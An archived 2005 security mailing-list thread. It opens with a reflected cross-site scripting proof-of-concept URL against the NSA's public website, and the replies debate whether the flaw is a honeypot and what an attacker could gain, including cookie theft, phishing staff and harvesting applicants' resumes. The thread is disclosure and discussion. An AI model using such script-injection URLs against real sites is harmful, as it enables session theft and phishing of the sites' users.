Discussion:
Not even the NSA can get it right
(too old to reply)
Barrie Dempster
2005-05-24 14:33:10 UTC
Permalink
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%
3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

"He who hingeth aboot, geteth hee-haw" Victor - Still Game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
J.A. Terranson
2005-05-24 14:53:57 UTC
Permalink
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
Too funny!
--
Yours,

J.A. Terranson
***@mfn.org
0xBD4A95BF


"Never belong to any party, always oppose privileged classes and public
plunderers, never lack sympathy with the poor, always remain devoted to
the public welfare, never be satisfied with merely printing news, always
be drastically independent, never be afraid to attack wrong, whether by
predatory plutocracy or predatory poverty."

Joseph Pulitzer
1907 Speech
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
James Tucker
2005-05-24 17:03:42 UTC
Permalink
Please, define right.

Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%
3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue
blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk
[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
"He who hingeth aboot, geteth hee-haw" Victor - Still Game
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Steve Wray
2005-05-24 19:47:39 UTC
Permalink
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so mislead
by this sort of bullcrap.

Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'

They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Post by James Tucker
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%
3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue
blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk
[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
"He who hingeth aboot, geteth hee-haw" Victor - Still Game
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Dan Margolis
2005-05-25 04:33:02 UTC
Permalink
Post by Steve Wray
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so mislead
by this sort of bullcrap.
Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
--
Dan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
J.A. Terranson
2005-05-25 11:15:01 UTC
Permalink
Post by Dan Margolis
Post by Steve Wray
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
While I agree with Dan, let me play Devil's Advocate: "live" Honeypot?
--
Yours,

J.A. Terranson
***@mfn.org
0xBD4A95BF


"Never belong to any party, always oppose privileged classes and public
plunderers, never lack sympathy with the poor, always remain devoted to
the public welfare, never be satisfied with merely printing news, always
be drastically independent, never be afraid to attack wrong, whether by
predatory plutocracy or predatory poverty."

Joseph Pulitzer
1907 Speech
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
James Tucker
2005-05-25 12:03:29 UTC
Permalink
Post by Dan Margolis
Post by Steve Wray
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so mislead
by this sort of bullcrap.
Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
No I'm saying they might have done. This is just one of many possible
explanations fo rtheir actions, and is as viable as ANY other
explanation. You forgot again, that we know nohting, and this means we
can also make no inferences.
Post by Dan Margolis
--
Dan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
milw0rm Inc.
2005-05-25 12:14:12 UTC
Permalink
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.

/str0ke
Post by James Tucker
Post by Dan Margolis
Post by Steve Wray
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
absolutely, and I'm glad someone said it. So many people get so mislead
by this sort of bullcrap.
Whenever I read any info volunteered, or even leaked, by an organisation
like that, I have to think 'what do they gain by me believing this?'
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
No I'm saying they might have done. This is just one of many possible
explanations fo rtheir actions, and is as viable as ANY other
explanation. You forgot again, that we know nohting, and this means we
can also make no inferences.
Post by Dan Margolis
--
Dan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
V***@vt.edu
2005-05-25 15:43:32 UTC
Permalink
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.

(Remember - the NSA probably knows more about proper airgapping than anybody.
All *those* webservers have on them is non-sensitive content, so you can't
actually *get* anything really interesting to happen - in the NSA view of the
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
Dan Margolis
2005-05-25 16:58:37 UTC
Permalink
Post by V***@vt.edu
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper airgapping than anybody.
All *those* webservers have on them is non-sensitive content, so you can't
actually *get* anything really interesting to happen - in the NSA view of the
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are. In
fact, it seems the common approach to security largely ignores any
notion of proactive law enforcement, and rightly so--you can't arrest
all the script kiddies, but you can write your software to be more
secure (or, to paraphrase Larry Lessig, _code_ is a much more effective
form of control in cyberspace than _law_ is, most of the time).

Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
--
Dan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
V***@vt.edu
2005-05-25 20:10:22 UTC
Permalink
Post by Dan Margolis
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are.
So watching the console logs on a tempting target like www.nsa.gov for
a month isn't going to give a *really* good idea of what's out there?

Consider - of those who went and tried the XSS that got posted, what percent
probably tried some *other* tricks to see what *else* they could get it to do?

Yes, the NSA crew almost certainly know the attacks themselves - but by keeping
an eye on what tricks have made it out to the script kiddies, they can measure
how fast the tricks propagate. Any attack they see on *that* server they can
safely conclude that it's part of the script kiddie canon (as it's very unlikely
that a black hat would blow a 0-day attacking that server when everybody *knows*
there's probably nothing worthwhile on there...)

Remember - we're talking about the organization that provided guidance on the
design of DES's S-boxes, which made *no* sense at the time. Many years later,
we find out that the NSA knew about differential cryptanalysis, the IBM crew
independently discovered it, but kept quiet at the NSA's urging, and then when
differential cryptanalysis came out in the open literature, the S-boxes made
sense. This gave the NSA a *very* good measure of how far ahead they were
at the time.

Or the public website is just maintained by low-pay civil servants (after
all, there's no need for a security clearance for any of those pages ;)
Post by Dan Margolis
Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
I never said you should. I merely implied that immediately concluding that
it was a stupid mistake might in itself be stupid. Remember - we *know* that
many black hats try to stay under the radar by leaving tracks that look like
common script kiddies (so all the recon probes disappear in the noise). Why
shouldn't the world leader in spreading and recognizing disinformation do the
same once in a while? ;)
Steve Kudlak
2005-05-27 03:59:51 UTC
Permalink
Way back when I worked for government agencies for a living all the easy
to get to sites had nothing sensitive on them. Everything that had
sensitive stuff was not on the ARPANET or was behind multiple gsteways.
Right now even normal citizens like you and me can build pretty secure
systems that will stop a lot of stuff. I assume the NSA does the same
too but can do better. I come from the "Rainbow Books" era and those
have been replaced by other things at this point. But there were a few
bugs in Sun's C-2 Security and that's low level.

Now it could be they hired some standard webdesign firm to do it and
that the website is only its sort of public face. There are Intanets
with much better security and there are secure Networks that run on nice
BSD variants that are very good. BSD is good because a lot of it is
people who every morning or evening;) they get up for the past 20+ years
they have thought about security issues and watched what happened and
all that stuff. I have been giggling at the teenagers who have been
attacking my website as of late. I learned a lot by reading the logs.
But but we have secure passwords that are not in any dictionary and all
that good stuff. It is also completely seperate from public accounts
like this one I use for day to chattering about on the Internet..

Have Fun,
Sends Steve


Have Fun,
Sends Steve
Post by V***@vt.edu
Post by Dan Margolis
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are.
So watching the console logs on a tempting target like www.nsa.gov for
a month isn't going to give a *really* good idea of what's out there?
Consider - of those who went and tried the XSS that got posted, what percent
probably tried some *other* tricks to see what *else* they could get it to do?
Yes, the NSA crew almost certainly know the attacks themselves - but by keeping
an eye on what tricks have made it out to the script kiddies, they can measure
how fast the tricks propagate. Any attack they see on *that* server they can
safely conclude that it's part of the script kiddie canon (as it's very unlikely
that a black hat would blow a 0-day attacking that server when everybody *knows*
there's probably nothing worthwhile on there...)
Remember - we're talking about the organization that provided guidance on the
design of DES's S-boxes, which made *no* sense at the time. Many years later,
we find out that the NSA knew about differential cryptanalysis, the IBM crew
independently discovered it, but kept quiet at the NSA's urging, and then when
differential cryptanalysis came out in the open literature, the S-boxes made
sense. This gave the NSA a *very* good measure of how far ahead they were
at the time.
Or the public website is just maintained by low-pay civil servants (after
all, there's no need for a security clearance for any of those pages ;)
Post by Dan Margolis
Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
I never said you should. I merely implied that immediately concluding that
it was a stupid mistake might in itself be stupid. Remember - we *know* that
many black hats try to stay under the radar by leaving tracks that look like
common script kiddies (so all the recon probes disappear in the noise). Why
shouldn't the world leader in spreading and recognizing disinformation do the
same once in a while? ;)
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Paul Kurczaba
2005-05-26 03:42:45 UTC
Permalink
To the NSA's advantage, I truly believe that the NSA.gov site is a
natural honeypot. If you think of all the people that try to break in to
it, the NSA looks at their logs and says "Sweet!, we've learned
something new today. Keep on comming..."

just my $0.02
Post by V***@vt.edu
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to attract
attention.
So now they've grepped their *Apache* logs

According to netcraft, they are running IIS.

, and they've
Post by V***@vt.edu
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper airgapping than anybody.
All *those* webservers have on them is non-sensitive content, so you can't
actually *get* anything really interesting to happen - in the NSA view of the
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Dan Margolis
2005-05-26 20:31:38 UTC
Permalink
Post by Paul Kurczaba
To the NSA's advantage, I truly believe that the NSA.gov site is a
natural honeypot. If you think of all the people that try to break in to
it, the NSA looks at their logs and says "Sweet!, we've learned
something new today. Keep on comming..."
just my $0.02
Valdis and I discussed this a little bit off-list. He disagrees, but I
contend that anything that the NSA could learn from such would be
useless to their two primary goals--securing intelligence, military, and
other government and private sector infrastructure, and conducting
interception/decryption/info war on foreign (or domestic?) "enemy"
targets.

Consider:

www.nsa.gov is NOT a tempting target, thus the likely attackers
are stupid kiddies.

Stupid kiddies are not going to use anything new to the NSA on
www.nsa.gov.

The NSA therefore learns a) what the kiddies know, and b) who the
kiddies are (assuming they don't disguise themselves well)

(a) is relatively useless; it's sole value *might* be in indicating what
is "public" and thus not likely to work against a target, but given that
they are going against targets with far more resources than the average
kiddie, this is a poor, if not worthless, indicator of such.

(b) is useless, because the NSA does not conduct law enforcement
operations against cyber criminals, nor, from what we've all heard, do
they cooperate overly well with the agencies that do.

So they've really got nothing to gain from wasting valuable employee
time on such a stupid matter. Even the NSA hires underpaid civil
servants--and I don't think it was a top-secret spook who coded the
ColdFusion behind the front page.

Feel free to let your own imaginations run wild, though. I've heard some
real convincing stories indicating that the Masons were behind the
September 11 attacks, too.
Post by Paul Kurczaba
According to netcraft, they are running IIS.
You can verify this for yourself by looking at the server headers--or
running an OS fingerprinting tool against them. Sure, they could be
spoofing it, but see above.
--
Dan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Barrie Dempster
2005-05-27 13:49:30 UTC
Permalink
Absolutely spot-on Dan,

My original posting was merely a link to an area of a page where someone
made a mistake, it's not a threat to US National Security in any big
way, the NSA don't give a damn about it. It's just a mistake made by a
developer on their public website, there are worse mistakes on that site
too, for anyone bored enough to go look.

The only people that care enough are defacers looking for a bit of fame.
No one with a life spends time trawling the NSA's website for trivial
errors, if you want to hack the NSA and you think their webserver is a
good place to start, you just might be out of your depth a little.

It wasn't supposed to spark a debate about what the NSA know, don't
know, would like to know, invented, stole or dreamed about. Although
that was probably my error, bringing it up in the first place, I should
have known there would be a tinfoil responses

I was in Nelson from the Simpsons mode and felt like I had to say
"HA-HA!" in public.

Anyone that thinks it's a honeypot is a nutter, if it was a honeypot as
Dan says its a very badly thought out one.

Just relax and feel safe in the knowledge that governments employ people
that make mistakes (there's a startling revelation!! :-P), point it out
to your next client so that it helps you get a contract or something.
Just don't come on FD and scream conspiracy though, because I've heard
them all and I'm the ringleader of most of them :-P.

BTW, I sell enhanced tinfoil very cheap, we all know that with simple
XSS regular tin foil is rendered useless!

Buy your enhanced tin foil now, it has built-in XSS protection!
{Lot's of snipped out but extremely well said and utterly correct opinion}
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

"He who hingeth aboot, geteth hee-haw" Victor - Still Game

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
James Tucker
2005-05-27 16:50:41 UTC
Permalink
Actually if one wanted to perform covert inter-government attacks, to
do so from any government infrastructure would be stupid as under many
modern laws this constitutes a state of war. To perform these attacks
as a portion of a script kiddie attack would make far more sense, and
would no implicate the government.

Futhermore, communications to and form such authorities may span many
mediums an operate in many directions. Real authentication in this
world occurs through KNOWLEDGE and knowledge alone, as no keys or
other authentication methods are viably secure. I say again, no-one
here really knows anything that they are talking about when it comes
to agencies who specialise in deception, as even your inference may
have been corrupted by previous operations.

This thread is entirely pointless.
Post by Barrie Dempster
Absolutely spot-on Dan,
My original posting was merely a link to an area of a page where someone
made a mistake, it's not a threat to US National Security in any big
way, the NSA don't give a damn about it. It's just a mistake made by a
developer on their public website, there are worse mistakes on that site
too, for anyone bored enough to go look.
The only people that care enough are defacers looking for a bit of fame.
No one with a life spends time trawling the NSA's website for trivial
errors, if you want to hack the NSA and you think their webserver is a
good place to start, you just might be out of your depth a little.
It wasn't supposed to spark a debate about what the NSA know, don't
know, would like to know, invented, stole or dreamed about. Although
that was probably my error, bringing it up in the first place, I should
have known there would be a tinfoil responses
I was in Nelson from the Simpsons mode and felt like I had to say
"HA-HA!" in public.
Anyone that thinks it's a honeypot is a nutter, if it was a honeypot as
Dan says its a very badly thought out one.
Just relax and feel safe in the knowledge that governments employ people
that make mistakes (there's a startling revelation!! :-P), point it out
to your next client so that it helps you get a contract or something.
Just don't come on FD and scream conspiracy though, because I've heard
them all and I'm the ringleader of most of them :-P.
BTW, I sell enhanced tinfoil very cheap, we all know that with simple
XSS regular tin foil is rendered useless!
Buy your enhanced tin foil now, it has built-in XSS protection!
{Lot's of snipped out but extremely well said and utterly correct opinion}
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue
blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk
[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
"He who hingeth aboot, geteth hee-haw" Victor - Still Game
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Eric Paynter
2005-05-30 19:57:17 UTC
Permalink
I've heard some real convincing stories indicating that the Masons were
behind the September 11 attacks, too.
I thought it was the Bush family. They seem to have made the most profit
from it... :P

-Eric

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Mister Coffee
2005-05-25 16:46:38 UTC
Permalink
<snip>
Post by Dan Margolis
Post by Steve Wray
They live in paranoia, fear and suspicion. Like the ninja of feudal
Japan they live and die in darkness. This is no way for a human being to
exist. But then I have been watching 'Shintaro the Samurai' :)
Wait, so are you folks saying that the NSA intentionally allowed an XSS
bug on their Web site so that someone here would report it for some
unknown-to-us devious end?
No, he's saying the NSA are a bunch of Ninja...

Sorry,
couldn't resist.

Cheers,
L4J

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Virus Friendly
2005-05-26 19:35:59 UTC
Permalink
I agree
Post by James Tucker
Please, define right.
Theirs is a world of deception, therefore any judgement you make based
upon any information may be comprised of as much disinformation as
information. In effect, you can't define such things for them.
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%
3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
--
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue
blog: http://zeedo.blogspot.com
site: http://www.bsrf.org.uk
[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
"He who hingeth aboot, geteth hee-haw" Victor - Still Game
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
imipak
2005-05-25 12:21:50 UTC
Permalink
Post by James Tucker
You forgot again, that we know nohting, and this means we
can also make no inferences.
Speak for yourself. Seems to me that a lot is known about these
things... purpose & function of NSA is well known (sigint.) Nature of
XSS attack scenarios is well understood, too.
Post by James Tucker
From this some basic conclusions can be drawn.
i-.
--
And what exactly is a dream?
And what exactly is a joke?
- Syd Barrett
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Lachniet, Mark
2005-05-25 17:06:01 UTC
Permalink
Puhleeze, do you really think that tax funded organizations have nothing
better to do? Government faces a continual battle for resources and
time. Setting up a "honeypot" as putzy as this would take time and
effort that could be much better spent. Are you sure it's the NSA that
is paranoid?

Mark Lachniet
-----Original Message-----
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to
put a honeypot is right out there in plain sight where it's
likely to attract
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper
airgapping than anybody.
All *those* webservers have on them is non-sensitive content,
so you can't actually *get* anything really interesting to
happen - in the NSA view of the world, "public website gets
defaced" isn't particularly interesting or noteworthy).
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
James Longstreet
2005-05-25 18:26:58 UTC
Permalink
Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.
That's not a problem?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Castigliola, Angelo
2005-05-25 17:24:40 UTC
Permalink
What would XSS on NSA.GOV get a hacker anyways? Steal my NSA.GOV cookie

"CFID
756140
nsa.gov/
1024
2871474816
31895379
3010520960
29692615
*
CFTOKEN
41950083
nsa.gov/
1024
2871474816
31895379
3010820960
29692615
*"

Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.

-Angelo Castigliola III
Security Architect

-----Original Message-----
From: full-disclosure-***@lists.grok.org.uk
[mailto:full-disclosure-***@lists.grok.org.uk] On Behalf Of Dan
Margolis
Sent: Wednesday, May 25, 2005 12:59 PM
To: full-***@lists.grok.org.uk
Subject: Re: [Full-disclosure] Not even the NSA can get it right
Post by V***@vt.edu
Post by milw0rm Inc.
lol are you guys joking? They wouldn't allow an xss bug on their
website on purpose come on now.
You're not devious enough. Remember that the *best* place to put a
honeypot is right out there in plain sight where it's likely to
attract
Post by V***@vt.edu
attention. So now they've grepped their Apache logs, and they've
added several dozen people to their "suspected script kiddie" list.
(Remember - the NSA probably knows more about proper airgapping than
anybody.
Post by V***@vt.edu
All *those* webservers have on them is non-sensitive content, so you
can't
Post by V***@vt.edu
actually *get* anything really interesting to happen - in the NSA view
of the
Post by V***@vt.edu
world, "public website gets defaced" isn't particularly interesting or
noteworthy).
Right, but why is XSS interesting? Why would they *want* a "suspected
script kiddie" list? Honeypots are good for learning about what sorts of
attacks are in the wild, *not* for learning who the attackers are. In
fact, it seems the common approach to security largely ignores any
notion of proactive law enforcement, and rightly so--you can't arrest
all the script kiddies, but you can write your software to be more
secure (or, to paraphrase Larry Lessig, _code_ is a much more effective
form of control in cyberspace than _law_ is, most of the time).

Granted, we don't know everything the NSA does, but I see little to gain
from a public XSS hole, however insignificant. Occam's razor, folks; why
should I buy into such a twisted conspiracy theory?
--
Dan
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
V***@vt.edu
2005-05-25 20:09:22 UTC
Permalink
Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.
You're assuming that the "inside" and "outside" appearances of the website
are similar enough that an NSA employee would fall for it.
Aaron Horst
2005-05-26 14:44:51 UTC
Permalink
Post by Castigliola, Angelo
What would XSS on NSA.GOV get a hacker anyways? Steal my NSA.GOV cookie
"CFID
756140
nsa.gov/
1024
2871474816
31895379
3010520960
29692615
*
CFTOKEN
41950083
nsa.gov/
1024
2871474816
31895379
3010820960
29692615
*"
Don't think a hacker could do much with this. At best someone could try
to use the exploit to phish passwords from NSA.GOV employees.
-Angelo Castigliola III
Security Architect
I don't know about you, but I personally think you could do quite a
bit of identity theft by seeing a few NSA applicants' resumes. Who
else would be more willing to give a "recruiter" sensitive personal
information?

https://www.nsa.gov/applyonline/index.html

AnthraX101
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Paul Kurczaba
2005-05-25 18:34:54 UTC
Permalink
The NSA may have some of the world's best mathematicians, but
certainly not the world's best web-coders :)
Post by Barrie Dempster
http://www.nsa.gov/notices/notic00003.cfm?Address=%22%3E%3Cscript%
3Ealert(%22We%20love%20our%20XSS%22)%3C/script%3E
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Loading...